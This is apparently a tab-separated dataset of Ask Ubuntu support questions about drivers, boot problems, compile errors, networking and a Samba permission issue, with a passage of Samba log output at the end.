356560	vmware lauch error	after upgrading the ubuntu to 12.04 lts , i plan to run vmware , while running the popup that `` before you can run vmware , several modules must be compiled and loaded into the running kernel ... kernel headers 3.8.0.31-generic were not found , if you them in not default path you can specify them and click install.. '' please share your view . please check the link for screenshot of error http : //s15.postimg.org/7i9gmds0r/vmware_error.png http : //s7.postimg.org/x4wi13h2z/vmware2.png
356563	network card sees my network but wont accept my password	i have an old dell inspirion 4000 i installed ubuntu 12 works great with cat 6 cable plugged in . but wireless wont connect . it sees my network prompts me for password but wont accept my password or connect .
356565	why does n't android recognize the wifi hotspot created via ubuntu ?	i have created wifi hot spot via my ubuntu laptop . and now i turned on wifi in my android mobile to access the internet but i 'm unable to view the hotspot that i had created via ubuntu laptop . did i do anything wrong ? i want to access the internet on my android mobile via ubuntu laptop 's wifi . is it possible ?
356568	btrfs fsck running on boot every time ?	i 've read some stuff that says that btrfs fsck is run every time on bootup . is this still true ? if so how can you tell when it runs or does not run on bootup ? i just installed ubuntu raring ringtail with btrfs .
356569	how to compile mpi program which having zeromq ?	mpic++ -g server.c -lzmq -lboost_system-mt -pthread -o server `pkg-config -- cflags -- libs gtk+-2.0` in file included from server.c:1:0 : zhelpers.h : in function ‘void s_dump ( void* ) ’ : zhelpers.h:82:44 : error : invalid conversion from ‘void*’ to ‘char*’ [ -fpermissive ] zhelpers.h : in function ‘void s_console ( const char* , ... ) ’ : zhelpers.h:157:33 : error : invalid conversion from ‘void*’ to ‘char*’ [ -fpermissive ] server.c : in function ‘int main ( int , char** ) ’ : server.c:68:17 : warning : deprecated conversion from string constant to ‘char*’ [ -wwrite-strings ] compile g++ no problem , however with mpic++ have compile error
356573	volume control on hp dv6 not working after alsamixer	because pulse audio made the sound out of my laptop distort very very easily at even the lowest volumes , i removed it and installed gnome-alsa instead but then now , the volume control buttons on f9 and f10 are n't working at all . i do n't think gnome-alsa recognizes them . what do i do ? ?
356575	how to i repair ubuntu ? it suddenly stopped booting !	i am running ubuntu 13.10 . it has been working really well for a couple of weeks . all of a sudden it wont boot . i get the grub or what ever its called menu to select the operating system to boot , ubuntu , advanced options for ubuntu , mac os x etc . by the way i am using it on the latest macbook pro with retina display 15 '' . when i select ubuntu i get this ==== or possibly this : : : : : across the whole top of the screen . i ca n't tell which one because ubuntu uses the full resoultion and display scailing of the retina display which significantly shrinks all of the ui . basically all i see is a row of : : : ===== : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : and that 's it , no ubuntu log in screeen or anything just distorted dots . ubuntu has been working well on my mac for the whole two weeks i 've had it . i do not want to loose my files or apps , assuming its possible to fix .
356578	shutdown and restart issue	i 'm dual booting win7 and ubuntu ( 12.04 lts ) but when i 'm shutting down/restarting ubuntu to switch os i only get to the log-out screen . i can turn the computer off with the power button but i would like to be able to do it the normal way .
356579	how to format a usb or external drive in 13.04 ?	i am using kubuntu 13.04 . how to format a usb or external drive ?
356582	how to change my shell to real bash ?	by typing echo $ 0 , i know i 'm using tcsh in my ubuntu 13.04 terminal . however no matter using chsh -s /bin/bash or just typing bash still ca n't make bash as my present shell . the interesting thing is that , if i type sh , then my shell will be sh . finally i found a more interesting thing : each time after i typing bash , i type ps to see the change , i found i get two more lines : one is new bash pid , another is new tcsh pid , which means each time after i tried to use bash shell , system automatically change my shell back to tcsh immediately . how can i solve this ? please help me ! thanks !
356583	installing wine as a brand new ubuntu user	i 'm trying to get wine working on ubuntu 13.04 and after way too much googling and even more hours of bashing my head against the keyboard due to all the failed attempts and dependency issues , i have decided to seek help . i know nothing about command line syntax aside from the copying and pasting i 've found on various searches and frankly do n't even know if i 've damaged any file structures in the process of my failure . how do i check if i 've goofed and how i goofed ? this is the error i get from the software center . i get errors in the terminal too , but was n't sure which parts were relevant so i thought i 'd wait for some input before wall of texting everyone . wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.10ubuntu1 is to be installed depends : libc6 ( > = 2.14 ) but 2.17-0ubuntu5 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu5 ) but 1.4.1-0ubuntu5 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu5 ) but it is a virtual package
356587	how to edit a .pdf file in kubuntu 13.04 ?	how to edit .pdf files in kubuntu 13.04 ? is there any supported software like `` adobe acrobat '' with the help of which i could do editing ?
356590	unable to play videos in firefox	i am using ubuntu 12.04 lts . when i try to open a video in firefox 25 browser , it is showing like install flash media plugin . when i click the button `` install plugin '' it is not installing . please help on with this one . i am having this problem since the last 5 days .
356592	graphic driver installions in hp pavilion g6 2236tx	i have brought a new hp pavilion g6 2236tx lappy , it is radeon hd 7370/7000 2gb graphics card with & using ubuntu 13.04 simultaneously . i have installed abacus software in ubuntu 13.04 . it was working but the application look like blurry , so i tried to install graphic drivers and from then on wards the launch bar and menu bar is missing , but the application is running fine with the installation of graphic drivers . can any one tell me how to find and install the correct graphic drivers and also do not affect the launch bar ?
356599	/usr/include/boost/config/select_stdlib_config.hpp:17:19 : fatal error : cstddef : no such file or directory	want to compile a zeromq program with boost library and boost threadpool from sourceforge however , got error gcc -g server.c -lzmq -lboost_system-mt -pthread -o server `pkg-config -- cflags -- libs gtk+-2.0` in file included from /usr/include/boost/config.hpp:40:0 , from /usr/include/boost/utility/addressof.hpp:15 , from /usr/include/boost/utility.hpp:12 , from boost/./threadpool/./detail/locking_ptr.hpp:24 , from boost/./threadpool/./detail/future.hpp:21 , from boost/./threadpool/future.hpp:21 , from boost/threadpool.hpp:20 , from server.c:6 : /usr/include/boost/config/select_stdlib_config.hpp:17:19 : fatal error : cstddef : no such file or directory compilation terminated .
356601	save to another partition	i installed ubuntu with two partitions , one is for the systems and the other is for all the datas . but as i installed programs it goes to the systems partition and makes the disk full . is it possible to install the programs to my other partitions since it has bigger memory ? thanks .
356604	why does asciidoc have texlive as a dependency ?	this is what happens when i try to install asciidoc : $ sudo apt-get install asciidoc reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : dblatex docbook-utils jadetex latex-beamer latex-xcolor libgraphite3 libkpathsea6 libptexenc1 lmodern luatex pgf prosper ps2eps tex-gyre texlive texlive-base texlive-bibtex-extra texlive-binaries texlive-common texlive-doc-base texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-luatex texlive-math-extra texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc tipa xmlto as far as i understand , it is completely unnecessary for the html and docbook backends : i would only need it if i want to generate latex files . this question is related to this question , in the sense that it is not easy to install vanilla tex live on a ubuntu / debian ( this is necessary for getting up-to-date versions of tex live components , sometimes ) .
356605	ubuntu 13.10 64 bit machinarium : error while loading shared libraries : libgtk-x11-2.0.so.0	i just downloaded ubuntu 13.10 final beta 64 bit and every program that i use work flawlessly with the exception of `` machinarium '' a very cool flash game . the game does n't have a .deb package and i used to be able to play it before . i tried installing lib32 and ia32 and it says it is installed to the last version or if i try lib32-dev it says that is no longer available . here is my ldd command result : fz @ unknown : ~/games/machinarium $ ldd machinarium linux-gate.so.1 = > ( 0xf77c8000 ) libstdc++.so.6 = > /usr/lib/i386-linux-gnu/libstdc++.so.6 ( 0xf76c0000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf76a5000 ) libx11.so.6 = > /usr/lib/i386-linux-gnu/libx11.so.6 ( 0xf756f000 ) libxext.so.6 = > /usr/lib/i386-linux-gnu/libxext.so.6 ( 0xf755c000 ) libxt.so.6 = > /usr/lib/i386-linux-gnu/libxt.so.6 ( 0xf7500000 ) libfreetype.so.6 = > /usr/lib/i386-linux-gnu/libfreetype.so.6 ( 0xf7461000 ) libfontconfig.so.1 = > /usr/lib/i386-linux-gnu/libfontconfig.so.1 ( 0xf7427000 ) libgtk-x11-2.0.so.0 = > not found libgdk-x11-2.0.so.0 = > not found libatk-1.0.so.0 = > not found libgdk_pixbuf-2.0.so.0 = > not found libpangocairo-1.0.so.0 = > not found libpango-1.0.so.0 = > not found libcairo.so.2 = > not found libgobject-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( 0xf73d3000 ) libgmodule-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgmodule-2.0.so.0 ( 0xf73ce000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf73c9000 ) libglib-2.0.so.0 = > /lib/i386-linux-gnu/libglib-2.0.so.0 ( 0xf72c4000 ) libnss3.so = > not found libsmime3.so = > not found libssl3.so = > not found libplds4.so = > not found libplc4.so = > not found libnspr4.so = > not found libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf7280000 ) libgcc_s.so.1 = > /lib/i386-linux-gnu/libgcc_s.so.1 ( 0xf7263000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf70b0000 ) libxrender.so.1 = > /usr/lib/i386-linux-gnu/libxrender.so.1 ( 0xf70a4000 ) /lib/ld-linux.so.2 ( 0xf77c9000 ) libxcb.so.1 = > /usr/lib/i386-linux-gnu/libxcb.so.1 ( 0xf7083000 ) libsm.so.6 = > /usr/lib/i386-linux-gnu/libsm.so.6 ( 0xf707a000 ) libice.so.6 = > /usr/lib/i386-linux-gnu/libice.so.6 ( 0xf7060000 ) libz.so.1 = > /lib/i386-linux-gnu/libz.so.1 ( 0xf7046000 ) libexpat.so.1 = > /lib/i386-linux-gnu/libexpat.so.1 ( 0xf701c000 ) libffi.so.6 = > /usr/lib/i386-linux-gnu/libffi.so.6 ( 0xf7015000 ) libpcre.so.3 = > /lib/i386-linux-gnu/libpcre.so.3 ( 0xf6fd4000 ) libxau.so.6 = > /usr/lib/i386-linux-gnu/libxau.so.6 ( 0xf6fd0000 ) libxdmcp.so.6 = > /usr/lib/i386-linux-gnu/libxdmcp.so.6 ( 0xf6fc9000 ) libuuid.so.1 = > /lib/i386-linux-gnu/libuuid.so.1 ( 0xf6fc2000 )
356607	how to increase the debugging level of an already running `wpa_supplicant` instance ?	how to increase the debugging level of an already running wpa_supplicant instance ? every attempt of using wpa_cli level result in a fail error message ( even after pre-selecting the interface with -i when invoking wpa_cli ) .
356609	how can i make rhythmbox/gpodder download podcasts into a single folder ?	i listen to podcast on my android phone . since i only listen to podcasts , i want to play a single folder . i am using folderplayer which can not go into subfolders ( at least , i did n't find how to make it do so ) . also , going through the available podcatchers and did n't like any of them . so , i want to copy all the files which rhythmbox/gpodder downloaded and into a single folder on my device . is it possible ? i can write a script that does so . but i want to be sure there is no other way first .
356612	booting error on 12.04	when i 'm booting ubuntu 12.04 this error is showing : render error detected , eir : 0x00000010 page table error pgtbl_er : 0x00000100 [ drm : i915_report_and_clear_eir ] *error* eir stuck : 0x00000010 , masking
356614	printing an email	i am strugglging with a serious lack of unix knowledge . i would like to download an email and print it immediately on receipt . system info : ubuntu 12.04 lts running as a vm edit to correct the mta below ( not manitou-mail ) i believe i have a postfix mta now confirmed . i did not do initial setup . i am using fetchmail to pop3 mail from gmail . the mail is being written to /var/spool/manitou/ each email is written to a file with the format : mail-yyyymmdd-hhmmss-xxxxx.processed i can cat any file to lpr which does print to the desired printer . my problem is that the body of the email is not in readable form . it looks like binary to me . perhaps it is mime encoding or some such of the message body . when i print it , the message comes out , with very short page lengths of about 10cm of printing . then of course the main message is in this coded format . is there a method of converting these email messages to prinatble text ? do i need to download in a particular format using fetchmail ? would fetchmail normally write the file in a fully readable format or is what i am seeing normal . i ask that last one because i want to make sure this manitou-mail application is not the one writing the file in this way . i do not believe it is , and i believe that manitou-mail is simply looking at specified folders for new files . manitou-mail is an email2db parser . i do not know the exact db but i think it is not part of this processs i am trying to achieve . i think it comes later on it 's own and imports new email files it finds written to the spool directories . i have looked at some guides and tutorials . i found a good one that would do what i want but the names of the script files being created are not included in the tutorial and i can not identify what they would be called from the examples given . any help would be appreciated . we are looking at pre-school level of knowledge here . thank you glass
356615	how can i setup a proper dns cache	i have configured dnsmasq ( see https : //wiki.debian.org/howto/dnsmasq ) but it does n't seem to do what i expected . its cache is somewhat working , so that when i for example do dig ubuntu.com twice , first time it takes some time , second time it 's instant . but when i do this a moment later , or after my secondary dns server is changed ( i connect to vpn or something ) all records seem to wipe out . is there a way to set up some proper , working dns cache , that does n't forget everything in a moment , but keeps its data for at least several days ? so that even if i disconnect from network , i could still resolve hostnames i tried to resolve before ? dnsmasq improves the caching `` a little bit '' i would like to improve it significantly
356617	'wireless network interface not found ' ubuntu 11.10 dell vostro 2420 driver	i think the issue is related to driver , output is following for : lspci -nnk | grep -ia2 net 07:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) subsystem : dell device [ 1028:0016 ] 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) subsystem : dell device [ 1028:0556 ] kernel driver in use : r8169 using ubuntu 11.1 on dell vostro 2420 . tried downloading bcmwl-kernel-source and b43-firmware and all other combinations of it ; in all possible scenarios like uninstalling kernel while trying b43 downloaded all possible driver souces as well as packages , but of no use . my wired network is all fine , even bluetooth is working fine but wireless is not showing . followed and tried almost all threads with the similar tags or topics , but of no use . plz share solution ... ( edited ) luckily i could get rid of it just after the last try i made after posting this question . finally i did- remove dkms framework from software center and installed wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb ( found this here http : //jas.gemnetworks.com/debian/pool/main/w/wireless-bcm43142/wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb ) had to install this twice ; because when you install it once it responds install the package if you trust the provider then you 've to again click install once again and rebooted system , wireless interface found up and running ... quite relieved after a 20 hrs troubleshoot session . : )
356618	can not mount /dev/loop0 ubuntu 12.04	i had ubuntu 12.04 booted on my computer for a while and decided it was time to get ubuntu 13.04 . i wiped my hard drive to start from scratch and when i loaded up ubuntu 13.04 i got the start screen but when i either chose install or just try it gives me can not mount /dev/loop0 . so i tried to revert back and just use ubuntu 12.04 but when i tried to boot it from the original disk i used when i first installed it it came up with an identical error screen . i know this error is happening a lot so hope someone could either help me or this particular situation might be of some use in the future .
356619	how to change grub 's default os ?	i 've installed linux dual boot with windows 7 and when i boot the computer in grub menu there is the linux distro the recovery mode and windows 7 of course the time of my grub is 5 secondes and it automaticlly boots in linux , please i want grub to boot automaticlly into windows please how do i make grub boot automaticlly into windows ? i mean when grub countdown is over i have a debian distro
356621	refresh display settings - using xrandr / laptop screen off , external screen on	i set the display settings of my laptop so that when an external screen is plugged in , only the external screen is used . however , when i plug it in after being logged into ubuntu , it stays as if no screen was plugged in . that is not a big problem since the display settings refresh after i go into `` system settings '' > `` displays '' . that is kind of unhandy , so i would like to use the terminal to refresh the display settings . i guess it has something to do with an xrandr command . i tried xrandr -- dryrun , this works but outputs a lot of stuff . it does n't seem to be the right command . what is the correct command ?
356622	how do you automatically rfkill unblock all on startup ?	i am an ubuntu/linux newbie , trying to overcome a range of issues , but eagerly learning a lot in the process . with help of this forum i was able to identify and solve the problem of getting my wireless to work . basically i discovered that it would work if i replaced network manager with wicd , and then typed `` rfkill unblock all '' into the command terminal . this sets `` hard blocked '' from yes to no , and then everything works great . i could still unblock the hard block when i had network manager but for some reason it still would n't work . only with wicd would it work . so i 'd recommend anyone struggling with getting their wireless to work to try wicd . my problem is that the hard block is set back to yes every time i restart my laptop . i do have a `` hard '' switch for the wireless , but it 's a toggle key on the keyboard ( fn + f7 ) , so its not really that `` hard '' actually . so every time ubuntu starts up i have to open the command terminal again , type `` rfkill unblock all '' then open wicd and ask it to connect ( even though it 's set on connect automatically ) . i was wondering if anyone could teach me how to make this process happen automatically on start up ? because of the intended use of this computer i have to restart often . alternatively , is there anyone who would be interested to help me find the root of my problem ? i.e . why the computer always boots up with the hard block set to yes ? hopefully solving either of these would also cause wicd to automatically connect on start up too .
356625	why there is no .deb for oracle java on oracle 's website ?	i want to use oracle java ( jdk ) 7u40 instead of openjdk-7 on my ubuntu 12.04 . first , i tried `` aptitude search java oracle '' and i did n't find it . so i went to oracle 's website to find a .deb . again , it was a fail , i only found a .tar.gz . i could have untar/ungzip this file ( in /opt/java for example ) but the system would n't be `` aware of '' java ( nothing in /usr/bin for example ) . i found on the web some repositories that i could add to make `` aptitude search java oracle '' work but i do n't know if it is a proper way to install oracle jdk . here are my questions , to what extent can you trust those repositories ? why oracle does n't publish a .deb for its jdk ? is open jdk as efficient as oracle jdk ? what do you think about the untar/ungzip way ?
356626	random glitch in unity ( 12.04 ) makes screen fuzzy	it happens randomly that i am doing some task and the screen suddenly becomes fuzzy . as if the graphics card is out of order but this never happened on gnome 3 . i am using ubuntu 12.04 with unity ui ( a regular one , not 2d ) . here are the snapshots of how it looks when blurriness appear . it 's dual screen monitor and the same image is on both monitors . any ideas how to fix this ? i 'd hate to go back to gnome 3 ux .
356627	open url from bash script	i have a text file google.com youtube.com gmail.com yahoo.com i am trying to open them with lynx . here is the thesis . i will store all of those links at a txt file , say links.txt and then i need to open them with lynx and then terminate lynx by using kill . here the code i wrote but its not correct for i in links.txt do lynx $ i sleep 10 pkill lynx done whats wrong here ?
356631	ubuntu server down on network	i have a machine which was setup for me to do web development and testing on . the only access that was setup was ssh and ftp . i do not have a screen or keyboard connected to the box , i simply plug it into my network and access from there . this worked very well but then it was switched off and unplugged for a week and when i plugged it back in it just will not show up on the network . i have tried rebooting everything and have waited out the dns address renewal periods ... but still can not access it . any ideas what has gone wrong and how to fix it ?
356634	acl tool for audit of ubuntu production servers	in my production environment , i have close to 10 ubuntu 12.04 servers and i want to get the list of users from them . i am looking for some kind of script or tool ( non-gui ) to get the same . yes , i can get the list from /etc/passwd and /etc/groups files but it would be good to have a tool or script to do this due to the following reasons . i have right now 10 systems in ubuntu and 30 systems in windows 2003 . i am recommending my organization and it to move all the systems to ubuntu except the one running ms sql server we do not have good ubuntu admins with us and they should not mess up with the system if i give some manual commands i also need to find out date of creation of user , group , password standards like strength , expiry etc please help me as i want to automate the process and get the list on weekly basis from it team . thanks in advance .
356638	no wireless nor hard with my live usb ubuntu 13.04	i have made a usb bootable key installing from mini.iso ( previous alternative install ) , thus key is crypted with llvm ( i think is not the point but you never know ) i installed gnome 3.8 ( i think is not the point but you never know ) when i plug the key on both laptops ( hp pavillon dm4 or dell latitude 6430u ) i get nor wireless nor hard ( via ethernet ) internet connexion ! i have a desktop ( not wireless ) on which the ethernet work ... do you have an idea of what i have to do to make it work , i am surprised this does not work out of the box ... ? reading this post , i join some logs bellow here is the result of sudo lshw -class network *-network disabled description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 03 serial : d8 : d3:85:37:56:4e size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:40 ioport:2000 ( size=256 ) memory : b0404000-b0404fff memory : b0400000-b0403fff *-network description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : b2400000-b2403fff *-network disabled description : wireless interface physical id : 2 logical name : wlan0 serial : 00:26:82:8d : f7:41 capabilities : ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.8.0-31-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn here is my lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) here is lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 045e:0737 microsoft corp . compact optical mouse 500 bus 001 device 003 : id 138a:0005 validity sensors , inc. vfs301 fingerprint reader bus 002 device 003 : id 054c:05b8 sony corp . bus 002 device 004 : id 10f1:1a28 importek result of rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : hp-wifi : wireless lan soft blocked : no hard blocked : no edit i ( re ? ) installed the realtech driver from the official website , all went smoothly but still nothing , i do not get it ... here is a pict
356639	limit battery charging 13.04 ( lenovo z500 )	hi everyone i am new to ubuntu . when i was using windows 8 , there is an app called energy mangement which limits the charging of battery when plugged in . but i cant seem to find similar to this in ubuntu . but looking at my laptop battery status , the `` time to full '' and `` time to empty '' are `` 0 secs '' please follow the link as i cant still upload image due to low reputation . http : //i.imgur.com/39gvvkv.png does it mean that its already configure to limit the battery charging to 60 % ? or is it just some sort of inaccuracy ? i am using lenovo z500 . ubuntu 13.04 64-bit thanks ! !
356640	ubuntu 13.10 mouse scroll wheel does in work in gtk3 apps	scrolling is ok with a mouse in firefox , but not with gtk3 apps . with the touch pad , two fingers scrolling works with all apps . i tested with xev and get button 4 and 5
356641	samba share - i can write but can not read	i have installed zentyal with file sharing ( samba ) . i have created groups to which i have assigned users and file shares . i can successfully write files to the shares with the assigned users , but strangely i can not read them back ( i can even delete them ) . e.g , i copy theme_innocompany.tar.gz from my desktop to the share , it works fine , all users can see the file has been copied there . now when any user ( including me , who just copied the file there ) tries to copy from the share , it fails with the error permission denied . here 's what i have in syslog for the copy : oct 11 12:36:48 activefs smbd_audit : office\yusufh|172.16.100.140|opendir|ok| . oct 11 12:36:48 activefs smbd_audit : office\yusufh|172.16.100.140|open|fail ( permission denied ) |r|theme_innocompany.tar.gz and here 's what 's in the samba.log ( also at http : //pastebin.com/jxw1xnxf ) : [ 2013/10/11 12:36:48.419623 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1423 of length 132 ( 0 toread ) [ 2013/10/11 12:36:48.419745 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.419799 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.419863 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.419928 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.419996 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.420040 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo theme_innocompany.tar.gz ( fnum [ fsp is null ] ) level=263 call=5 total_data=0 [ 2013/10/11 12:36:48.422173 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1424 of length 132 ( 0 toread ) [ 2013/10/11 12:36:48.422228 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.422273 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.422322 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.422372 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.422427 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.422469 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo theme_innocompany.tar.gz ( fnum [ fsp is null ] ) level=263 call=5 total_data=0 [ 2013/10/11 12:36:48.424051 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1425 of length 80 ( 0 toread ) [ 2013/10/11 12:36:48.424106 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.424150 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.424198 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ . ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.424244 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : . reduced to /home/samba/shares/activeline [ 2013/10/11 12:36:48.424309 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo . ( fnum [ fsp is null ] ) level=263 call=5 total_data=0 [ 2013/10/11 12:36:48.425553 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1426 of length 92 ( 0 toread ) [ 2013/10/11 12:36:48.425606 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.425659 , 3 ] ../source3/smbd/trans2.c:2390 ( call_trans2findfirst ) call_trans2findfirst : dirtype = 16 , maxentries = 1366 , close_after_first=0 , close_if_end = 1 requires_resume_key = 1 backup_priv = 0 level = 0x104 , max_data_bytes = 16644 [ 2013/10/11 12:36:48.425709 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ * ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.425762 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : * reduced to /home/samba/shares/activeline/* [ 2013/10/11 12:36:48.430534 , 3 ] ../source3/smbd/dir.c:663 ( dptr_create ) creating new dirptr 256 for path . , expect_close = 1 [ 2013/10/11 12:36:48.430627 , 3 ] ../source3/smbd/dir.c:1149 ( smbd_dirptr_get_entry ) smbd_dirptr_get_entry mask= [ * ] found ./ . fname= . ( . ) [ 2013/10/11 12:36:48.430702 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.430748 , 3 ] ../source3/smbd/dir.c:1149 ( smbd_dirptr_get_entry ) smbd_dirptr_get_entry mask= [ * ] found ./.. fname=.. ( .. ) [ 2013/10/11 12:36:48.430831 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.430876 , 3 ] ../source3/smbd/dir.c:1149 ( smbd_dirptr_get_entry ) smbd_dirptr_get_entry mask= [ * ] found ./recyclebin fname=recyclebin ( recyclebin ) [ 2013/10/11 12:36:48.430978 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.431025 , 3 ] ../source3/smbd/dir.c:1149 ( smbd_dirptr_get_entry ) smbd_dirptr_get_entry mask= [ * ] found ./theme_innocompany.tar.gz fname=theme_innocompany.tar.gz ( theme_innocompany.tar.gz ) [ 2013/10/11 12:36:48.431109 , 3 ] 